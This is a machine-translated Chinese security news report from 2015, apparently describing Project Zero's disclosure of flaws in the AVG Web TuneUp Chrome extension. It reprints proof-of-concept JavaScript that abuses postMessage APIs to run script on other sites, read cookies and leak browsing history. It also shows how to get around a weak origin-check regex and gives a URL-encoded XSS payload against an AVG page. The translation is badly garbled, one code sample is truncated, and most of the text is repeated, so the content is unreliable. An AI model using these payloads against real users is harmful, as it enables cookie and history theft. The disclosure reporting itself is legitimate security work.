Google browser plug-in AVG Web TuneUp aeration multiple high-risk vulnerabilities, affect 9 0 0 million users-vulnerability warning-the black bar safety net

2015-12-31T00:00:00
ID MYHACK58:62201570581
Type myhack58
Reporter 佚名
Modified 2015-12-31T00:00:00

Description

This year 8 month 1 5 days, from project zero members Tavis submit a Google browser plug-in AVG Web TuneUp multiple vulnerabilities, since the plug-in active users of about 9 0 0 million, so the impact range is very wide. This plugin adds a lot of api used to operate Google Chrome, for example, can easily hijack the search box and new tab. And because its installation process is very complex, it is possible to escape the Google malware check, in particular, is able to escape the Google browser“to prevent the abuse of extended API”checked. In fact many of the api is problematic, the attacker can construct the payload successfully steal the user in avg. com on the cookie, you can also obtain the user's browsing history and other private data, even the possibility of successful implementation of any command execution. Attack techniques Tavis in to the vendors e-mail lists several attack methods:"navigate" API will result in a generic cross-domainxssvulnerability, the attacker. com can cross-domain read the visitor's mail. google. com the mail or from other sources of data. for (i = 0; i The above code for Tavis to the poc Through the window. postMessage(allows cross-domain communication with javascript api) nonstop to AVG: "Web TuneUP”plugin to initiate a request, the request data is: { origin: "web", action: "navigate", data: {url:"javascript:document. location. hostname. endsWith('. avg.com')"+ "?"+ "alert(document. domain + ':' +document. cookie)"+ ":"+ "false",tabID: i}} When the user tab in the access avg. com website, will be blasting to. avg. com at the end of the current site of the domain name and cookie value."recently" api will be leakage of the current user browse record window. addEventListener("message", receiveMessage, false); window. postMessage({ from: "web", to: "content", method: "recently" }, "*")

function receiveMessage(event) { if (event. data != undefined && event. data. historyItems != undefined) { var obj = JSON. parse(event. data. historyItems);

document. write("Here is a list of websites you've been visiting"); document. write(" "); for (i in obj) { var d = new Date(obj[i]); document. write("" + i + " on " + d); document. write(" "); } } } The above code for Tavis to the poc Through the window. postMessage to the plugin"recently"API initiated request to get the current user's browsing history, the local listening event to obtain the returned data, and then outputs the data. Then the manufacturers for the repair, but due to the repair of the wrong, and is Tavis bypass. Fix the code to increase the judgment var match = event. origin. match(/https?:\/\/.*\. avg\.com/i);

if (match ! null { ... } Determine the source is not included". avg.com"but this is easily bypassed. Such as https://www. avg. com. www. attacker. com this domain name will be able to bypass this limit, to continue the implementation of the above-mentioned two attacks. And because of the above to the Protocol of the judge is to support both http and support for https, then in turn produces the“man in the middle attack”this problem. Manufacturers of this and a fix, this limits the domain name must be"mysearch.avg.com"and"webtuneup.avg.com" it. But by following thisxss, he can be for user data stolen: the http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html?risk=%3Cimg%20src=x%20onerror=alert(1)%3E&searchParams=%7B%22lang%2 2%3A%22en%2 2%2C%22pid%2 2%3A%22pid%2 2%2C%22v%2 2%3A%22vv%2 2%7D This problem in 4. 2. 5. 1 6 9 version of AVG Web TuneUp to get a repair, you can By in the store for the upgrade.

This year 8 month 1 5 days, from project zero members Tavis submit a Google browser plug-in AVG Web TuneUp multiple vulnerabilities, since the plug-in active users of about 9 0 0 million, so the impact range is very wide. This plugin adds a lot of api used to operate Google Chrome, for example, can easily hijack the search box and new tab. And because its installation process is very complex, it is possible to escape the Google malware check, in particular, is able to escape the Google browser“to prevent the abuse of extended API”checked. In fact many of the api is problematic, the attacker can construct the payload successfully steal the user in avg. com on the cookie, you can also obtain the user's browsing history and other private data, even the possibility of successful implementation of any command execution. Attack techniques Tavis in to the vendors e-mail lists several attack methods:"navigate" API will result in a generic cross-domainxssvulnerability, the attacker. com can cross-domain read the visitor's mail. google. com the mail or from other sources of data. for (i = 0; i The above code for Tavis to the poc Through the window. postMessage(allows cross-domain communication with javascript api) nonstop to AVG: "Web TuneUP”plugin to initiate a request, the request data is: { origin: "web", action: "navigate", data: {url:"javascript:document. location. hostname. endsWith('. avg.com')"+ "?"+ "alert(document. domain + ':' +document. cookie)"+ ":"+ "false",tabID: i}} When the user tab in the access avg. com website, will be blasting to. avg. com at the end of the current site of the domain name and cookie value."recently" api will be leakage of the current user browse record

[1] [2] next